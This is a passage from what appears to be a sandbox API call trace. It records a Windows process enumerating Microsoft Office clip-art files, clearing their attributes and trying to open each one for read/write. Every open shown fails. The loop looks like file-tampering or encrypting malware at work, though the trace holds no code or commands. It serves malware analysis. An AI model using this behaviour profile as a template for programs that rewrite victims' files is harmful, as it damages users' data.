(hObject=0xffffffffffffffff) returned 0 [0135.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.725] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.725] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293236.WMF", dwFileAttributes=0x80) returned 0 [0135.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293236.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293236.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.726] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.726] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.726] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293238.WMF", dwFileAttributes=0x80) returned 0 [0135.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293238.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293238.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.726] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.726] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.726] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.726] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293240.WMF", dwFileAttributes=0x80) returned 0 [0135.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293240.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293240.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.727] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.727] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.727] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.727] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293570.WMF", dwFileAttributes=0x80) returned 0 [0135.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293570.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293570.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.727] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.727] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.727] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.728] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293828.WMF", dwFileAttributes=0x80) returned 0 [0135.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293828.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293828.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.728] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.728] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.729] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.729] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293844.WMF", dwFileAttributes=0x80) returned 0 [0135.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293844.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293844.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.729] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.729] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.729] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.729] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0295241.GIF", dwFileAttributes=0x80) returned 0 [0135.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0295241.GIF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0295241.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.730] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.730] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297185.WMF", dwFileAttributes=0x80) returned 0 [0135.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297185.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0297185.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.730] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.730] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297551.WMF", dwFileAttributes=0x80) returned 0 [0135.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297551.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0297551.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.731] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.731] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.732] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297707.WMF", dwFileAttributes=0x80) returned 0 [0135.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297707.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0297707.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.732] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.732] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297749.WMF", dwFileAttributes=0x80) returned 0 [0135.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297749.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0297749.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.733] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298653.WMF", dwFileAttributes=0x80) returned 0 [0135.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298653.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0298653.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.733] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298897.WMF", dwFileAttributes=0x80) returned 0 [0135.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298897.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0298897.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.734] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.735] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.735] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.735] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299125.WMF", dwFileAttributes=0x80) returned 0 [0135.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299125.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299125.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.735] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.735] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.735] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.735] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299171.WMF", dwFileAttributes=0x80) returned 0 [0135.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299171.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299171.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.736] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.736] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.736] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.736] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299587.WMF", dwFileAttributes=0x80) returned 0 [0135.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299587.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299587.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.736] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.736] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.736] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.736] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.736] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299611.WMF", dwFileAttributes=0x80) returned 0 [0135.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299611.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299611.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.737] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299763.WMF", dwFileAttributes=0x80) returned 0 [0135.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299763.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299763.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.738] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.738] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300520.GIF", dwFileAttributes=0x80) returned 0 [0135.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300520.GIF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0300520.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.738] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.738] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300840.WMF", dwFileAttributes=0x80) returned 0 [0135.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300840.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0300840.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.739] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.739] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.739] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300912.WMF", dwFileAttributes=0x80) returned 0 [0135.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300912.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0300912.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.740] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.740] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301050.WMF", dwFileAttributes=0x80) returned 0 [0135.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301050.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0301050.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.741] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301076.WMF", dwFileAttributes=0x80) returned 0 [0135.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301076.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0301076.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.741] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.741] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.741] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301252.WMF", dwFileAttributes=0x80) returned 0 [0135.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301252.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0301252.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.742] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.742] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.742] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.742] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301480.WMF", dwFileAttributes=0x80) returned 0 [0135.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0301480.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0301480.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.743] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.743] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.743] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.743] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.743] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG", dwFileAttributes=0x80) returned 0 [0135.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302827.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0302827.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.743] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.743] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.743] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.743] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG", dwFileAttributes=0x80) returned 0 [0135.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0302953.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0302953.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.744] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.744] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0304933.WMF", dwFileAttributes=0x80) returned 0 [0135.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0304933.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0304933.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.744] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.744] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305257.WMF", dwFileAttributes=0x80) returned 0 [0135.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305257.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0305257.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.745] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.745] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.745] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.745] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.746] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305493.WMF", dwFileAttributes=0x80) returned 0 [0135.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0305493.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0305493.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 